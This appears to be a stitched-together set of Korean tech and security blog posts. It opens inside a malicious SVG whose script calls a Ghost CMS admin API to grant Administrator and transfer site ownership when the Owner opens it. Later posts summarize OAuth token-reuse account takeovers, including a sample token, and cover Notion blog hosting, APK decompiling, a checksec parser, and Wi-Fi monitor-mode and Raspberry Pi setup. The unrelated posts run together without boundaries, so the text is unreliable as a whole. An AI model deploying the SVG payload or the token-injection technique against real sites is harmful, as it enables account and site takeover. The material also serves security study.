                id: '[Admin-Role-ID]',
                name: 'Administrator',
                description: 'Administrators',
              }],
              url: 'http://localhost:3001/404/'
            }]
          };
    
          fetch(url1, {
            method: 'PUT',
            headers: {
              'Content-Type': 'application/json',
              'x-ghost-version': '5.75',
              'app-pragma': 'no-cache',
              'User-Agent': 'Mozilla/5.0 (Windows NT
          10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
          Gecko) Chrome/117.0.5938.132 Safari/537.36',
              'Accept': '*/*',
              'Origin': 'http://localhost:3001',
              'Sec-Fetch-Site': 'same-origin',
              'Sec-Fetch-Mode': 'cors',
              'Sec-Fetch-Dest': 'empty',
              'Referer': 'http://localhost:3001/ghost/',
              'Accept-Encoding': 'gzip, deflate, br',
              'Accept-Language': 'en-US,en;q=0.9',
            },
            body: JSON.stringify(data1),
          })
          .then(response => {
            if (!response.ok) {
              throw new Error(`HTTP error! Status: ${response.status}`);
            }
            return response.json();
          })
          .then(data => {
            console.log('First Request Success:', data);
    
            // Second Request
            const url2 = 'http://localhost:3001/ghost/api/admin/users/owner/';
            const data2 = {
              owner: [{
                id: '[User-ID]'
              }]
            };
    
            fetch(url2, {
              method: 'PUT',
              headers: {
                'Content-Type': 'application/json',
                'x-ghost-version': '5.75',
                'app-pragma': 'no-cache',
                'User-Agent': 'Mozilla/5.0 (Windows NT
          10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
          Gecko) Chrome/117.0.5938.132 Safari/537.36',
                'Accept': '*/*',
                'Origin': 'http://localhost:3001',
                'Sec-Fetch-Site': 'same-origin',
                'Sec-Fetch-Mode': 'cors',
                'Sec-Fetch-Dest': 'empty',
                'Referer': 'http://localhost:3001/ghost/',
                'Accept-Encoding': 'gzip, deflate, br',
                'Accept-Language': 'en-US,en;q=0.9',
              },
              body: JSON.stringify(data2),
            })
            .then(response => {
              if (!response.ok) {
                throw new Error(`HTTP error! Status: ${response.status}`);
              }
              return response.json();
            })
            .then(data => {
              console.log('Second Request Success:', data);
            })
            .catch(error => {
              console.error('Second Request Error:', error);
            });
          })
          .catch(error => {
            console.error('First Request Error:', error);
          });
        </script>
      </svg>

• Owner가 악성 SVG 파일을 열람하고 나면, Contributor 계정이 Owner로 바뀐다.

Cloudflare를 이용한 호스팅 방식의 단점

노션 블로그 만들기 A to Z - Part 1 (도메인 발급부터 연결까지) 포스팅에서 아래와 같이 블로그를 구축했었습니다.

• 호스팅 케이알에서 도메인 발급
• Cloudflare을 이용하여 도메인과 노션 페이지 연결

하지만, Cloudflare의 Basic 플랜을 사용하다보니 생각보다 불편한 점이 많다는 것을 깨달았습니다.

• 구글/네이버 검색 노출 어려움
• 유입 경로 확인 어려움
• 요청 횟수 제한으로 인해 유입량을 감당하기 어려움

저와 비슷한 상황을 겪고 노션 블로그 → 깃허브 블로그로 옮긴 분도 계셨습니다. 왜 Part 1 작성 당시에는 이 글을 발견하지 못했는지 ☹️

https://www.cv-learn.com/20201124-Notion-blog-to-Github-blog/

Oopy를 이용해보자!

아무쪼록 결국 우피(Oopy) 라는 서비스를 이용하기로 했습니다. 구글/네이버 검색, 유입 경로 확인, 요청 횟수 제한 없음 등 기존에 고민하던 부분을 모두 해결할 수 있을 것 같아 바로 결제를 진행했습니다.

한 달 구독료는 5,900원(부가세 포함 6,490원)이며, 도메인 비용을 포함하더라도 월 10,000원 안쪽으로 해결 가능하기 때문에 부담 없는 수준입니다. 커피 한 번 안 사 먹으면 되는 비용이라 전혀 아깝지 않았어요.

Oopy 설정

도메인 연결

우선 아래와 같이 기존 호스팅 설정을 해제하고, Oopy 콘솔을 통해 도메인을 다시 연결해 주어야 합니다.

• Cloudflare에서 기존 설정 삭제 (그냥 사이트 자체를 삭제해버리면 됨)

• 호스팅 케이알 네임 서버 복구 (Cloudflare 네임서버를 기존 네임서버로 변경)

• 호스팅 케이알 CNAME, A레코드 설정

• Oopy 콘솔에서 도메인 연결 + 리다이렉트 URL 설정

도메인 연결 이후 일정 시간이 지나면 https://{도메인} 또는 https://www.{도메인} 주소를 통해 노션 블로그 접속이 가능해집니다.

커스텀 도메인 설정은 우피 가이드에도 잘 나와 있습니다.

https://www.oopy.io/ko/guides/hostname-registration/custom

UI 설정

이후 폰트, 데이터베이스 등을 커스터마이징 하여 블로그를 예쁘게 꾸며 주면 됩니다.

(UI 설정은 개인의 취향에 따라 다를 수 있기에.. 자세히 기재하지 않도록 하겠습니다.)

추가 설정

그리고 검색 엔진, 트래픽 분석, 광고, 댓글 등의 설정은 아래 가이드 문서를 참고하시어 진행해 주시면 되겠습니다. 이 정도만 설정해 주면, 그 외에 더 손 볼 부분은 없다고 보시면 됩니다. 🙂

1. 검색 엔진: https://www.oopy.io/ko/guides/seo

2. 구글 애널리틱스(유입 경로 분석): https://www.oopy.io/ko/guides/plugins/ga

3. 구글 애드센스(광고): https://www.oopy.io/ko/guides/plugins/google-adsense

4. 디스커스(댓글): https://www.oopy.io/ko/guides/plugins/disqus

📌원문: https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts 포스팅을 보고 공부하면서 요약 작성한 글입니다.

개요

OAuth 소개

• Open Authorization
• 2006년 처음 소개된 이후 AppSec 도메인에서 많이 사용되는 인증 프로토콜 중 하나가 되었다.
• 구현이 쉽지만 그 이면에는 매우 복잡한 기능들이 존재한다.
• OAuth 프로토콜 자체는 올바르게 설계되어 있고 본질적으로 안전하나, 웹 서비스 플랫폼에 통합하는 과정에서 종종 문제가 발생한다.

이 포스팅에서는 일반적인 OAuth 구현 문제를 설명한다. 소셜 로그인 메커니즘과 OAuth 구현에 대한 공격 기법을 소개한다. Grammarly, Vidio, Bukalapak 서비스에서 취약점을 시연한다.

+) 첫 번째 및 두 번째 블로그 게시물도 참고하면 좋을 것 같다.

OAuth 소개

Implicit Grant Type 예시

John 이라는 사용자가 Facebook 계정을 사용하여 Randomsite.com에 연결하려 한다고 가정한다.

1. Login with Facebook 클릭

2. Randomsite.com 에서는 페이스북 로그인 페이지로 리다이렉트

   https://www.facebook.com/v3.0/dialog/oauth?**redirect_uri=https://randomsite.com/OAuth** &scope=email&client_id=1501&state=[random_value]&response_type=token.

3. Facebook에서 로그인 및 계정 연결 동의

4. Facebook은 Randomsite.com에 대한 Secret 토큰을 반환하고 브라우저를 redirect_uri로 리다이렉션

   https://randomsite.com/OAuth#token=[secret_token]]&state=[Random_Value]

5. Secret 토큰을 포함하여 Randomsite.com에 다시 접속하면 URL에서 토큰을 읽어 옴

6. 5번 단계에서 획득한 토큰을 가지고 아래 API를 통해 Facebook과 통신

   https://graph.facebook.com/me?fields=id,name,email&access_token=[secret_token].

7. Facebook에서는 Secret 토큰의 소유자 정보를 반환해 줌

Implicit Grant Type 외에 Explicit Grant Type도 존재하는데, 이는 Randomsite.com가 토큰 대신 코드를 받고 Facebook에 추가 요청을 보내 토큰을 받는 개념이라고 보면 된다.

액세스 토큰 확인

위 6~7단계에서 서버가 토큰을 받으면 사용자의 신원을 확인하기 위해 Facebook에 API 요청을 보낸다.

이러한 방식은 안전하게 구현되어 있을까??

위 Facebook 문서를 보면, 토큰을 수신한 서버는 이를 검증해야 한다고 기재되어 있다.

요청을 보내기 전 액세스 토큰을 확인하는 것은 개발자의 책임인 셈이다.

취약 사례

Vidio

OAuth 인증 구조

Vidio는 온라인 비디오 스트리밍 플랫폼이다. 영화, TV, 라이브 스포츠, 오리지널 프로덕션 등 다양한 콘텐츠를 제공한다. 이 플랫폼의 OAuth 흐름을 살펴보자. 이전에 살펴본 Randomsite.com 예제와 거의 비슷하다.

위 예제에서 숫자 92356은 App ID이다. 애플리케이션이나 웹사이트가 developer.facebook.com에 등록되면 Facebook은 고유한 무작위 App ID를 할당해 준다.

OAuth 요청이 들어 왔을 때 Facebook은 App ID를 보고 어떤 앱이 요청을 했는지 식별한다. Vidio의 경우 92356 이다.

3단계에서 Facebook에 접속하면 Facebook은 Vidio.com에 대한 액세스 토큰을 생성해 준다. 액세스 토큰에는 사용자 정보(이메일)와 Vidio App ID 정보가 모두 포함되어 있다.

아무튼 Vidio.com이 사용자로부터 액세스 토큰을 받으면, com/debug_token API를 통해 액세스 토큰이 App ID 92356에 실제로 생성되었는지를 확인해야 한다.

Facebook은 자동으로 인증을 수행해 주지 않고, 체크하는 것은 온전히 개발자의 몫이다.

그러나 Vidio.com 에서는 토큰을 따로 검증해주지 않고, 공격자가 다른 App ID 에서 생성된 액세스 토큰을 사용할 수 있게 된다.

공격 시나리오

공격자가 악성 웹사이트를 구축하고 이를 YourTimePlanner.com이라고 가정한다. 공격자는 이 사이트를 쇼핑몰이나 시간관리 앱 같은 합법적인 웹사이트로 위장 게시한다.

그리고 일반 사용자들이 이 웹사이트에 접근해서 로그인하기를 기다린다. 아마 대부분의 사람들은 새로운 웹사이트에 직접 가입하는 대신 소셜로그인 기능을 활용해 로그인 할 것이다.

수천 명의 사람들이 가입했다고 가정하면, 공격자는 실제 사용자에 대한 수천 개의 액세스 토큰을 보유하게 된다. 물론 App ID는 YourTimePlanner의 App ID일 것이고, 예시 토큰을 살펴보면 다음과 같다.

"EAAut0eRcO1QBO9IrSS8xryMLF9wdSuGMGXiVbgJEsMjhLkqRhLYb0z1RcDJ9yw8RTvN0n5VTEfTazaifUYYVcovFutFG3GUP8feKftp4U7gXJaz0lY9wNttKZBqZAP8ZCszUHZAwN8o5iZ BKLSyF7UZAUsITmcs57EXDW44bEGdZBt6rQRkoeGMgtPghfgHrqefbIfBkdyLneTqPMZD"

Facebook 토큰 디버거를 사용하면 액세스 토큰에 대한 모든 정보를 확인할 수 있다.

• 사용자: Dan Bro(moreisless3dan@gmail.com)
• App ID: TimePlanner(3287341734837076)

위 토큰을 Vidio.com에 삽입하면 어떻게 될까? 실제로 계정 탈취가 가능해질 수 있다. 물론 Vidio.com에 계정이 있어야만 가능한 일이다. 최종적으로 아래와 같이 Dan Bro의 계정으로 로그인할 수 있다.

Bukalapak

OAuth 인증 구조

Bukalapak은 1억 5천만 명의 사용자를 보유한 인도네시아에서 가장 크고 유명한 전자상거래 플랫폼 중 하나이다. 이러한 전자상거래 플랫폼에서 계정 탈취 취약점이 존재하는 경우 큰 문제가 될 수 있다.

Bukalapak의 OAuth 인증 구조는 위 Vidio와 거의 동일하다.

Bukalapak의 /fb_login 엔드포인트는 액세스 토큰을 매개변수로 받고, 자격 증명을 반환해 준다. 그런데 여기서 액세스 토큰의 유효성을 검증하지 않으므로, 다른 웹사이트에서 발급된 토큰을 삽입하여 타 사용자의 권한을 탈취할 수 있게 된다.

Grammarly

OAuth 인증 구조

Grammarly는 문법, 구두점, 철자 검사 등 다양한 기능을 제공해 주는 AI 기반 글쓰기 도구이다. 이 서비스의 경우 사용자가 작성한 문서를 계정 내에 직접 저장하고 있어, 계정 탈취 시 Victim이 작성한 문서에 액세스 할 수 있게 된다.

Grammarly에서의 OAuth 인증 플로우는 다음과 같다.

1. Sign in with Facebook
2. Facebook 리다이렉션 URL 반환
3. Facebook으로 리다이렉션
4. Secret 코드를 포함한 Grammarly 리다이렉션 URL 반환
5. auth.grammarly.com에 POST로 code 값 전송
6. 해당 code 값을 기반으로 사용자를 인증하고 자격 증명을 반환 (코드를 토큰으로 교환)

OAuth에서는 토큰과 코드라는 두 가지 유형의 데이터타입을 지원해 준다. Vidio와 Bukalapak에서는 토큰을 사용했고 토큰 재사용 공격에 취약했었다.

Grammarly 같이 코드를 사용하는 경우, 서버는 이를 토큰으로 교환해야 하고, 이 때 App ID에 대한 유효성 검사를 수행하게 된다. 그렇다면 어떻게 계정을 탈취할 수 있을까?

Grammarly에서 최종적으로“facebook_login”: {”code”: “코드”} 와 같이 전송되는데, “code” 라는 키워드를 다른 것으로 바꿔보자.

• Token
• facebookToken
• FBToken
• Ftoken
• AccessToken
• AccessSToken
• TkTAccess-token
• Access_tokenand
• others...

그 중 access_token이 실제로 동작했다고 한다.

TimePlanner에서 획득한 Dan의 토큰을 access_token 값으로 넣고 요청을 보내면 실제로 인증에 성공하는 것을 볼 수 있다. code 값을 쓰고 있어 토큰 재사용 공격에 취약하지 않을 것으로 보였으나, 파라미터 변조를 통해 임의의 토큰을 주입할 수 있었다.

미티게이션

소셜 로그인을 지원하는 경우, 다른 사이트에서 발급 받은 토큰을 재사용할 수 없도록 유효성을 검증해야 한다. Facebook 뿐만 아니라 다양한 서비스에서 이러한 기능을 지원해 주는데, 프로바이더 자체에서 유효성을 검증해줄 순 없기 때문에, 직접 지침에 따라 구현해 주어야 한다.

다양한 블로그 플랫폼을 이용해 봤지만, 아래와 같은 단점들로 인해 결국 정착하지 못했고..

• 네이버 블로그: 일상 블로그 용으론 적합하나, 기술 블로그 용으로 쓰기엔 애매
• 티스토리: 커스터마이징 하기 귀찮아서 안 쓰게 됨
• Velog: 가장 직관적이고 작성하기 편한데 카테고리 분류가 안 됨

Velog 보다 조금 더 편하고 직관적이고 귀찮지 않은 플랫폼이 뭐가 있을까 고민하다가 노션 블로그를 구축해 보기로 했습니다. 그럼 이제 본격적으로 노션 블로그를 만들기 위한 방법들을 리서치 해보겠습니다.

물론 지금은 매달 들어가는 oopy 구독료와 도메인 유지비가 아까워서 다시 velog로 돌아왔지만요..

노션 블로그 만드는 방법

1. 노션 공유 기능

노션에서 기본으로 제공되는 <페이지 공유> 기능을 이용하면 나름 블로그처럼 이용할 수 있습니다. 하지만 단점은 URL이 지저분하고 공유 페이지 목록을 관리하기 어렵다는 점이죠.

2. 우피 (oopy)

그 외 서드파티 중 가장 접근성 좋은 서비스는 oopy.io 입니다. 실제로 개인 블로그나 포트폴리오 뿐만아니라 회사 홍보 차원에서도 우피를 많이 사용하고 있더라고요.

도메인, 라우팅 URL 등 커스터마이징 할 수 있는 요소도 많고 구글 애드센스 연동도 쉽게 할 수 있어서 가장 처음에 사용을 고려했던 서비스입니다.

다만 무료체험 기간 동안 이용해본 결과 저는 딱히 우피에서 제공되는 기능을 사용하지 않을 것 같아 잠시 보류해 두었습니다.

3. 도메인 직접 연결

그래서 도메인 구입 후 노션과 직접 연결해 블로그 환경을 구축해보기로 했습니다. 😎 도메인 연결 과정이 번거롭긴 하지만 1번과 2번의 아쉬운 점을 단번에 해결할 수 있는 효율적인 방법이에요.

도메인 발급

저는 hosting.kr 에서 도메인을 발급했습니다. *.xyz 도메인을 이벤트 가격으로 저렴하게 구매할 수 있어서 좋았어요. 1년에 2,750원이라 벌써 뽕 뽑은 느낌 🙂

그리고 만약 학생이신 분들은 Github Student Developer Pack 에 가입해서 무료로 *.me 도메인을 발급 받으실 수 있다고 하니 참고 하시기 바랍니다.

도메인 연결

1. Cloudflare 가입

이메일과 비밀번호만 입력하면 바로 가입할 수 있습니다. 이메일 인증도 gogo ~

2. 사이트 생성

그 다음 이전 단계에서 발급해 둔 도메인 주소를 입력하여 사이트를 추가해 주세요.

3. Nameserver 변경

이제 Cloudflare를 거쳐서 노션으로 라우팅 되도록 설정해줄 차례입니다. 기존 호스팅 서비스의 네임 서버를 Cloudflared의 네임 서버로 변경해 줍니다.

4. 보안 설정

그리고 SSL/TLS 및 HTTPS 등 Cloudflare의 가이드에 따라 적절히 설정을 해 주시면 되고요.

5. Workers 설정

마지막으로 Workers 설정이 남아 있습니다. Workers는 도메인에 접속 했을 때 실행할 자바스크립트를 설정하는 메뉴라고 보시면 됩니다. (도메인 → 노션으로 라우팅 하기 위한 설정)

Fruition: Free, Open Source Toolkit for Building Websites with Notion

위 페이지에 도메인과 노션 URL을 입력할 수 있는 Form이 존재하는데, 입력 후 “Copy the Code” 버튼을 누르면 Workers 코드가 뚝딱 완성됩니다.

최종적으로 Workers 메뉴에서 응용 프로그램 생성 후 → 복사한 코드를 붙여 넣고 → 도메인 룰을 지정해 주면, 우리가 지정한 도메인에 접속 했을 때 해당 코드가 실행될 것입니다.

6. Mismatch between origin and baseUrl 에러 해결

그러나 이렇게 설정하고 도메인에 접속했을 때 Mismatch between origin and baseUrl 오류가 발생하는 경우도 존재합니다. 저는 이 오류 때문에 삽질을 꽤 했었습니다. 🥲

원인만 설명 드리자면, 노션에서 도메인을 별도로 설정한 이력이 있는 경우 도메인이 맞지 않아 발생한 케이스였습니다.

따라서 Workers 소스코드에서 “www.notion.so” 로 되어 있는 부분을 내 노션 도메인(~.notion.site)으로 바꿔 주어야 합니다.

완료

모든 설정이 끝난 뒤 도메인으로 접속했을 때 노션 페이지가 표출되는 것을 확인할 수 있었습니다.

Ref

• https://www.oopy.io/
• Fruition: Free, Open Source Toolkit for Building Websites with Notion
• https://next.over.ist/fruitionsite-with-cloudflare-workers-error-1034
• https://antennagom.com/m/1020
• https://github.com/stephenou/fruitionsite/issues/236

apktool

apk 파일로부터 dex 파일을 추출한다.

Apktool - How to Install

자바 설치 : sudo apt install default-jdk

dex2jar

dex 파일로부터 jar 파일을 추출한다.

dex2jar

설치 후 alias 설정 : alias dex2jar=’/home/lee/tool/dex2jar-2.0/d2j-dex2jar.sh’

jd_gui

jar 파일을 java 소스코드로 보여준다.

Java Decompiler

자바 설치 : https://java.com/ko/download/

만약 dex2jar 실행시 DexException not support version 에러가 뜬다면 아래 글 참고 https://www.programmersought.com/article/6193889467/

Kotlin

Android Studio IDE에 코틀린 디컴파일 기능이 존재한다고 한다. Android Studio

딱히 조급한 마음도 없고, 내 자신에 대한 확신도 있고, 기쁜 일들도 많고, 그래서 요즘이 가장 행복한 시기인 것 같다. 그리고 좋은 사람들 덕분에 이런 저런 제안들도 많이 들어오고 있다. 감사한 일이다. 면접만 잘 본다면 올 하반기에 취업할 수 있을 것 같은데, 내가 하기 나름이니까 열심히 해봐야지.

주로 노션을 쓰다보니 Velog 관리를 소홀히 하게 된다. oopy로 노션 자체를 호스팅 해야 하나 싶기도 하고 .. 매번 포스팅을 옮기는 과정이 생각보다 귀찮아서 고민을 좀 해봐야겠다.

Challenge

보안 업무를 하다 보면, 가끔 바이너리 보호 기법을 리스팅해야 하는 일이 생기기도 한다. 그럴 때 주로 사용하는 도구가 checksec이며, PIE, RELRO, Canaries, ASLR, Fortify Source의 활성화 여부를 확인해주는 bash 스크립트이다. 나는 CTF 플레이어가 아니지만, CTF 할 때 가장 많이 사용하는 듯하다.

아무쪼록 다음과 같은 checksec 수행 결과를 엑셀 테이블로 변환하여 저장하는 코드를 작성해 보자.

Install

$ pip install openpyxl # python
$ pip3 install openpyxl # python3

openpyxl 패키지는 엑셀 작업을 수행할 수 있도록 도와주는 파이썬 패키지이다.

Solution

Canary와 PIE가 없는 것만을 파싱하여 기재하고, 나머지는 -로 표기할 것이다. 해당 코드를 실행하기 전에 checksec 수행 결과를 log.txt라는 파일로 저장해 놓아야 한다.

import openpyxl
import re

class Excel:
    def __init__(self):
        self.workbook = openpyxl.Workbook()
        self.sheet = self.workbook.active
        self.initialize()

    def initialize(self):
        self.row = 2

        title_list = ['No.', 'FILENAME', 'RELRO', 'STACK CANARY', 'NX', 'PIE', 'RPATH', 'RUNPATH']
        ascii_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H']
        index = 1

        for title in title_list:
            self.sheet.cell(row = 1, column = index).value = title
            index = index + 1

        for ascii in ascii_list:
            if ascii == 'B':
                width = 40
            elif ascii == 'A':
                width = 5
            else:
                width = 20
            self.sheet.column_dimensions[ascii].width = width

    def parse(self):
        f = open('log.txt', 'r')
        data = f.read()
        data_split = data.split('\n')[1::2]
        return data_split

    def write(self, filename, flag):
        if flag['Canary'] and flag['PIE']:
            return

        self.sheet.cell(row = self.row, column = 2).value = filename

        if not flag['Canary']:
            self.sheet.cell(row = self.row, column = 4).value = 'No canary found'
        else:
            self.sheet.cell(row = self.row, column = 4).value = '-'

        if not flag['PIE']:
            self.sheet.cell(row = self.row, column = 6).value = 'No PIE'
        else:
            self.sheet.cell(row = self.row, column = 6).value = '-'

        if not flag['RELRO']:
            self.sheet.cell(row = self.row, column = 3).value = 'No RELRO'
        else:
            self.sheet.cell(row = self.row, column = 3).value = '-'

        if not flag['NX']:
            self.sheet.cell(row = self.row, column = 5).value = 'NX disabled'
        else:
            self.sheet.cell(row = self.row, column = 5).value = '-'

        if not flag['RPATH']:
            self.sheet.cell(row = self.row, column = 7).value = 'No RPATH'
        else:
            self.sheet.cell(row = self.row, column = 7).value = '-'

        if not flag['RUNPATH']:
            self.sheet.cell(row = self.row, column = 8).value = 'No RUNPATH'
        else:
            self.sheet.cell(row = self.row, column = 8).value = '-'

        self.sheet.cell(row=self.row, column = 1).value = self.row - 1
        # self.sheet.cell(row=self.row, column = 3).value = '-'
        # self.sheet.cell(row=self.row, column = 5).value = '-'
        # self.sheet.cell(row=self.row, column = 7).value = '-'
        # self.sheet.cell(row=self.row, column = 8).value = '-'

        self.row = self.row + 1
        print(f'[*] {filename} : row {self.row} added')

    def set_flag(self, line):
        flag = {
            'RELRO' : True,
            'Canary' : True,
            'NX' : True,
            'PIE' : True,
            'RPATH' : True,
            'RUNPATH' : True
        }

        if 'No canary found' in line:
            flag['Canary'] = False

        if 'No PIE' in line:
            flag['PIE'] = False

        if 'No RELRO' in line:
            flag['RELRO'] = False

        if 'NX disabled' in line:
            flag['NX'] = False

        if 'No RPATH' in line:
            flag['RPATH'] = False

        if 'No RUNPATH' in line:
            flag['RUNPATH'] = False

        return flag

    def check(self, line):
        filename = re.split(r' {2,}', line)[-1].split('\t')[-1].split('/')[-1]
        flag = self.set_flag(line)

        self.write(filename, flag)

    def run(self):
        data_split = self.parse()
        for line in data_split:
            self.check(line)
        self.save()

    def save(self):
        self.workbook.save('result.xlsx')


if __name__ == "__main__":
    excel = Excel()
    excel.run()

실행 흐름을 따라가며 각 함수의 기능에 대해 알아보도록 하자.

run

def run(self):
    data_split = self.parse()
    for line in data_split:
        self.check(line)
    self.save()

Excel 클래스 생성 후 가장 먼저 호출하는 함수. 모듈화 해 놓은 각 기능들을 한 번에 호출하는 용도로 만들어 두었다. parse, check, save 순으로 실행됨.

parse

def parse(self):
    f = open('log.txt', 'r')
    data = f.read()
    data_split = data.split('\n')[1::2]
    return data_split

log.txt 파일을 열어서 개행문자 \n를 기준으로 데이터를 쪼갠다. 참고로 아래 사진을 보면 두 줄 간격으로 의미 있는 데이터가 존재한다. 따라서 [1::2]과 같이 간격을 두고 split 하여 저장하였다.

check

def check(self, line):
    filename = re.split(r' {2,}', line)[-1].split('\t')[-1].split('/')[-1]
    flag = self.set_flag(line)
    self.write(filename, flag)

정규표현식으로 파일 이름을 가져온 뒤, set_flag 함수를 호출하여 보호 기법 활성화 여부를 체크한다. 그리고 write 함수에서 self.sheet.cell(row = self.row, column = N).value의 값을 지정해준다. (각 셀에 데이터를 채우는 과정임)

save

def save(self):
    self.workbook.save('result.xlsx')

self.workbook은 openpyxl 패키지에서 제공되는 객체이다. workbook: 엑셀 파일, worksheet: 엑셀 시트 cell: 엑셀 한 칸 이라고 생각하면 될 것 같다. 아무튼 result.xlsx라는 파일로 저장하면 모든 과정은 끝난다.

Result

파일명은 가렸고, 다음과 같이 Canary와 PIE가 비활성화 된 바이너리 리스트만 출력할 수 있었다. 이렇게 필터링 해서 뽑아놓고 세부적으로 점검하면 되겠지. python으로 툴링하는 게 왜 이렇게 재미있는지 모르겠다. 마법같은 언어야.

준비물은 다음과 같다.

1. 이더넷 연결이 가능한 라즈베리파이나 기타 장비
2. PC
3. 랜선

Steps

Step 1 : 랜선 연결

연결할 장비와 PC를 랜선으로 연결한다.

Step 2 : 네트워크 설정

• 네트워크 상태 - 어댑터 옵션 변경

• Wi-Fi: 현재 PC가 접속한 네트워크
• 랜선을 연결하면 이더넷~ 이라는 이름의 인터페이스가 생겨 있을 것이다.

• 위와 같이 Wi-Fi 인터페이스의 인터넷 연결 공유 설정을 진행한다.
• 내가 연결할 장비의 이더넷 인터페이스를 지정한다.

• 그리고 이더넷 인터페이스 설정을 확인해봐야 한다.
• 자동으로 IPv6/DNS 서버 주소 받기로 선택되어 있으면 대부분 잘 된다.

Step 3 : IP 확인

> arp -a

• IP 스캐닝 도구를 쓸 수도 있는데 arp -a 명령어를 통해 간단히 확인이 가능하다.
• 자동으로 IP 주소를 받게끔 설정이 되어 있는 경우 라즈베리파이는 192.168.137.X의 IP 주소를 할당받았을 것이다.
• 해당 IP로 ssh 접속을 하면 잘 된다.

트러블슈팅

• 이것 때문에 삽질을 엄청 했었다.
• 나의 경우는 USB ctype-LAN 젠더의 문제였다.
• 다른 젠더로 변경하니 바로 IP 주소가 할당되었다.

개요

IoT 기기 분석을 하다보면, 모니터 모드로 패킷을 잡거나 보낼 일이 종종 생기곤 한다. 그래서 TL-WN725N라는 무선 랜카드를 구입했다.

별다른 리눅스 드라이버 설치 없이 wlan0 인터페이스가 잡히길래 바로 아래와 같이 모니터 모드를 활성화 하려고 했는데, 역시나 안 되었다.

명령어:

ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

# 또는
airmon-ng check kill
airmon-ng start wlan0

실행 결과:

Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; Invalid argument.

구글링을 좀 해보니 아래 과정대로 모니터 모드를 활성화 시킬 수 있다고 해서 해봤는데,

sudo apt update
sudo apt upgrade
sudo apt install bc
sudo rmmod r8188eu.ko
git clone https://github.com/aircrack-ng/rtl8188eus.git
cd rtl8188eus
sudo -i
echo "blacklist r8188eu.ko">"/etc/modprobe.d/realtek.conf"
exit
make
sudo make install
sudo modprobe 8188eu

현재 커널 버전에 맞는 linux-headers를 apt-get으로 설치하지 못해서 make, sudo make install시 에러가 발생했다.

Makefile에서 KVER = 5.10.0-kali7-amd64로 맞추거나 modules 폴더명을 변경후 진행하면 make는 잘 되지만 make install에서 문제가 발생했다.

해결

커널 버전을 업그레이드 해줌으로써 해결

#1

$ sudo apt-get install linux-headers-5.10.0-kali7-amd64
$ sudo cp /lib/modules/5.10.0-kali7-amd64 /lib/modules/5.10.0-kali3-amd64/ -rf
$ sudo ln -s /lib/modules/5.10.0-kali7-amd64/build /lib/modules/5.10.0-kali3-amd64/build

echo 'blacklist r8188eu'|sudo tee -a '/etc/modprobe.d/realtek.conf'
make && sudo make install
sudo reboot
sudo airmon-ng check kill
sudo ip link set <interface> down
sudo iw dev <interface> set type monitor

그런데 VirtualBox 말고 VMWare에서 설치했더니 header 파일을 다시 다운로드 할 필요가 없었다. (환경에 따라 다를 수 있음!)

#2

또 다른 방법으로는, sudo apt-get dist-upgrade를 통해 업그레이드를 선행해주면 된다. 결론적으로는 헤더 버전과 커널 버전의 미스매치로 인해 오류가 발생할 수 있다는 것!

sudo apt-get -y dist-upgrade # 헤더 버전 안 맞을 때
reboot
sudo apt-get install -y linux-headers-$(uname -r) bc

git clone https://github.com/aircrack-ng/rtl8188eus
cd rtl8188eus
make && sudo make install

NetworkManager

여기까지 설정한 뒤 wlan0 인터페이스에 대해 모니터모드를 활성화하면Monitor 모드로 바뀐다.

모니터 모드로 바뀐 모습:

┌──(kali㉿kali)-[~]
└─$ iwconfig
wlan0     unassociated  Nickname:"<WIFI@REALTEK>"
          Mode:Monitor  Frequency=2.412 GHz
          # ...

이제 이 상태에서 NetworkManager 설정만 변경해주면 모든 과정이 완료된다.

NetworkManager는 주기적으로 모든 인터페이스를 모니터링하면서 관리하는데, Monitor 모드로 전환된 인터페이스에 접근하면서 오동작을 유발할 수 있다.

따라서 wlan0 인터페이스를 별도로 관리하지 않도록 설정해주어야 한다.

/etc/NetworkManager/NetworkManager.conf 하위에 추가:

[keyfile]
unmanaged-devices=interface-name:mon*;interface-name:wlan1;mac:AA:BB:CC:DD:EE:FF

위 AA:BB:CC:DD:EE:FF 대신 인터페이스의 MAC 주소를 입력해주면 된다. (MAC 주소는 ifconfig, ip 커맨드를 통해 확인 가능)

이후 네트워크 서비스를 재시작 하거나 재부팅 하면 설정이 적용된다.

service network-manager restart

# 또는
systemctl restart NetworkManager

# 또는
reboot

끝😁

스크립트

재부팅 하면 Monitor 모드가 Managed 모드로 바뀌는데, 그럴 때마다 매번 커맨드를 입력하기 귀찮아서 아래와 같이 스크립트를 작성해두면 좋다.

#!/bin/bash

sudo airmon-ng check kill
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
ifconfig
iwconfig

#!/bin/bash

airmon-ng start wlan0
airmon-ng check kill
iwconfig

References

에러 해결을 위해 참고한 페이지들..

• How to Make the TL-WN722N and TL-WN725N in Monitor mode in kali (Virtual Box)
• Can't install Linux Headers (Kali Linux)
• Make error aircrack-ng/rtl8188eus Issue #64
• TP Link TL-WN725N (v2) driver install issue
• Make error on rtl8188eus file aircrack-ng/rtl8188eus Issue #106
• aircrack-ng/rtl8188eus
• monitor mode - gilgil

binwalk --dd='.*' kt.img

확장자 파싱

#!/bin/bash

for FILE in `ls`
do
        STR=`file $FILE`
        if [[ $STR == *'ELF'* ]] ;then
                mv $FILE $FILE.elf
        fi
done

• 아주 아주 간단한 스크립트로 파일 확장자를 파싱할 수 있다.

• 위의 경우 ELF 파일을 *.elf 형식으로 바꿔준다.

❯ ls
0  13CA4  144E8D  144F01  151704  151BC0  152258  40500  4BE8  60000  7A2C8  9CEAD  elf.sh  F0000
❯ vi elf.sh
❯ ./elf.sh
❯ ls
0.elf  13CA4  144E8D  144F01  151704  151BC0  152258  40500  4BE8  60000.elf  7A2C8  9CEAD  elf.sh  F0000.elf

• 실행 결과

환경 : 칼리 리눅스 in 라즈베리파이

$ ifconfig eth0 down
$ ifconfig wlan0 up

$ iwlist wlan0 scan # ssid 발견

$ wpa_passphrase [ssid]
network={
    ...
}

$ vi /etc/wpa_supplicant/wpa_supplicant.conf
# wpa_passphrase 결과 copy-paste

$ iwconfig wlan0 essid [ssid]
$ wpa_supplicant -iwlan0 -c/etc/wpa_suppliant/wpa_supplicant.conf &
